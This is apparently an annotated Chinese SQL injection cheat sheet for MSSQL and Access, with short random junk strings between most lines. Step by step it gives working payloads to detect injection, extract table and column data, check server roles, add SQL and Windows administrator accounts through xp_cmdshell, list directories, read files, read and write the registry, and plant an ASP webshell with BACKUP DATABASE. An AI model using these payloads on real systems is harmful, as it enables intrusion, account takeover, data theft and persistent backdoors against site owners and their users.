1.判断是否存在注入：分别追加 ;and 1=1 与 ;and 1=2 ，两次返回页面不同则说明条件被拼进了 SQL 并被执行。
2.初步判断是否是 mssql： ;and user>0 ——user 为 nvarchar 类型，与整数比较会触发类型转换错误，错误信息中会带出当前数据库用户名；此方法依赖页面回显数据库错误信息。
IaDN[:SX
3.注入参数为字符型时：'and [查询条件] and ''=' ——前导单引号闭合原语句中的字符串，末尾的 ''= 与原语句剩下的引号拼成 ''='' ，保持语法正确。
Re`'dde=
4.搜索功能参数未过滤时（LIKE 查询）：'and [查询条件] and '%25'=' ——%25 是 URL 编码后的 % ，解码后成为 LIKE 通配符，与原语句中的 '%...%' 模式配合闭合。
"YUh4uZ~P
5.判断数据库类型（通过各自特有的系统表是否存在来区分）
!KYX\HRW
;and (select count(*) from sysobjects)>0   返回正常则为 mssql（sysobjects 在新版本中只是兼容视图，等价于 sys.objects）
!N, Oe<
;and (select count(*) from msysobjects)>0   返回正常则为 access（注意：普通用户对 msysobjects 可能没有读权限，此时表现为报错而非返回正常）
*G]zN "Y
K6C@YY(
rD7L==Ld
6.猜表名（原文写作"数据库名"，实际填入的是表名）： ;and (select Count(*) from [表名])>0 ——表存在则页面正常，否则报错。
D7|=ev
7.猜字段名： ;and (select Count(字段名) from 表名)>0 ——字段存在则页面正常。
_[eAA4h
8.猜字段首条记录的长度： ;and (select top 1 len(字段名) from 表名)>0 ——把 0 逐步换成其它数值做二分即可确定长度（top 1 没有 order by，取到哪一条由引擎决定）。
zcn> 4E)
9.(1)逐字符猜字段内容的 ascii 值（access）
@U~i<kt
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 ——mid 的第二个参数是字符位置，逐位递增；把 >0 换成 >N 做二分。
~Ogtgr
(2)逐字符猜字段内容的 ascii 值（mssql）
YlF<S49loC
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 ——unicode() 返回的是 UTF-16 码位而非 ascii，因此也能处理中文字符。
=vqy5y
10.测试当前连接账户的权限（mssql）：IS_SRVROLEMEMBER / IS_MEMBER 是成员返回 1，不是返回 0，角色名无效返回 NULL。
n0/H2>I[
~E]ct F
0`{3|g
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--   服务器级最高权限，下文的 xp_cmdshell、sp_addlogin、注册表操作等都需要它
"ggViIOw&
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
X {["4
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
@xO?SjH
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
PT`];C(he
C4Tn
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
iyj,0T
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
nBVR)|+M
;and 1=(select IS_MEMBER('db_owner'));--   数据库级角色，只代表对当前库的所有权，不等于 sa
6m=FWw3y
?iX1;c9
d]kP@flOV
11.添加 mssql 登录和操作系统账户（需要 sysadmin；xp_cmdshell 自 SQL Server 2005 起默认禁用，需先通过 sp_configure 开启）
#/UlW
;exec master.dbo.sp_addlogin 'username';--   创建 SQL 登录（sp_addlogin 已弃用，新版本应使用 CREATE LOGIN）
;exec master.dbo.sp_password null,'password','username';--   参数顺序为 旧密码,新密码,登录名；原文把登录名和密码写反了
NI@$"
;exec master.dbo.sp_addsrvrolemember 'username','sysadmin';--   参数顺序为 登录名,角色名；原文顺序颠倒且缺少逗号
SkmL X@:(
;exec master.dbo.xp_cmdshell 'net user username password
sSh=Idrx
/workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--   （接上一行，net user 的各个开关之间必须有空格）
fn!(cE|`E
;exec master.dbo.xp_cmdshell 'net user username password /add';--   上面那条的精简写法
|L@9qwF
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--   把新建的系统账户加入本地 administrators 组
X5(S+;v"^
s+=JT+g
\Y EV
5
12.(1)遍历目录（借助 xp_dirtree 把结果写入自建表，再通过报错逐条读出）
L>,j*a_[
;create table dirs(paths varchar(100), id int)   —— xp_dirtree 默认输出两列（子目录名、深度），所以建两列；目录名超过 100 字符会因截断而插入失败
oX2J2O
;insert dirs exec master.dbo.xp_dirtree 'c:\'
[i8,rOa7
;and (select top 1 paths from dirs)>0   ——字符串与整数比较触发转换错误，错误信息中带出 paths 的值
<hYrcOt
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0   ——原文末尾的 >) 为笔误，应为 >0；每次把已得到的值加入 not in 列表，即可逐条取出
IH
i$Rlb5RU
5M.KF;P
c:a5pd7T
(2)遍历目录（另一种写法：用一张多列临时表接收多个扩展存储过程的输出）
!'-|]xx(
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--   建四列是为了容纳 xp_availablemedia 的四列输出
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（输出四列，必须与 temp 的列数一致）
7_AR()CM
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表（单列输出）
0(uNFyIG
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构（两列：子目录名、深度）
$V
6.%V"l
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件内容（每行输出一条记录；同样依赖 xp_cmdshell 已开启）
)u. ut8![T
`=]I-5#.W
P5:X7[
13.mssql 中操作注册表的扩展存储过程（均位于 master，通常需要 sysadmin 权限）
. PzlhTL7
xp_regenumvalues 注册表根键, 子键
VTDp9s
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   以多个记录集方式返回该子键下所有值
/r4QDwu
xp_regread 根键,子键,值名
Jy,Dcl
;exec xp_regread
Lv;R8^n
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   返回指定值的内容（接上一行）
t^|+|>S
xp_regwrite 根键,子键, 值名, 值类型, 值
lgxG:zAC
常用的值类型有两种：REG_SZ 表示字符串，REG_DWORD 表示整数
Q%xvS,oI
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'   写入注册表
^JDiI7
xp_regdeletevalue 根键,子键,值名
+["t@Q4IQ
pg}9baW?
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   删除某个值
e3+'m
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   删除键，包括该键下所有值
{9 >jWNx
))M; .b.D
[:HT=LX3
14.利用 mssql 的 backup 写 webshell（前提：SQL Server 服务账户对目标 web 目录有写权限，且已知该目录的绝对路径）
9(%ptnya
use model
7Y:~'&U|
create table cmd(str image);
|%F[.9Dp
insert into cmd(str) values ('');   -- 引号内应填入 webshell 代码；原文此处为空，推测是 ASP 标签在转载时被过滤掉了
! H)D@,@ &
backup database model to disk='c:\l.asp';   -- 备份文件里除 webshell 外还夹带二进制内容，ASP 解释器会忽略 <% %> 之外的部分
Td&w
LB<,(dyh
*$ZLu jy7
15.利用 mssql 内置函数取信息（以下均依赖报错回显：把字符串与整数比较触发转换错误）
x,Im%!h
;and (select @@version)>0   获得 SQL Server 版本及其所在 Windows 的版本
+L4_]
;and user_name()='dbo'   判断当前数据库用户是否为 dbo ——注意 user_name() 返回的是数据库用户名，sa 以及任何映射为 dbo 的登录都会返回 dbo；严格判断是否 sa 应使用 system_user='sa' 或第 10 条的 IS_SRVROLEMEMBER('sysadmin')
kaxAIk8l
;and (select user_name())>0   爆出当前数据库用户名
?#F}mOVAa
;and (select db_name())>0   得到当前连接的数据库名
,+0>p
Z8\c'xN
sR`WV6!9
16.简洁版 webshell（与第 14 条相同，仅输出路径不同；同样要求服务账户对该目录可写）
kLKd
O0
use model
em@\S
create table cmd(str image);
I!y[7^R
insert into cmd(str) values ('');   -- 引号内应填入 webshell 代码；原文此处为空，推测是 ASP 标签在转载时被过滤掉了
sa%2,e'
backup database model to disk='g:\wwwtest\l.asp';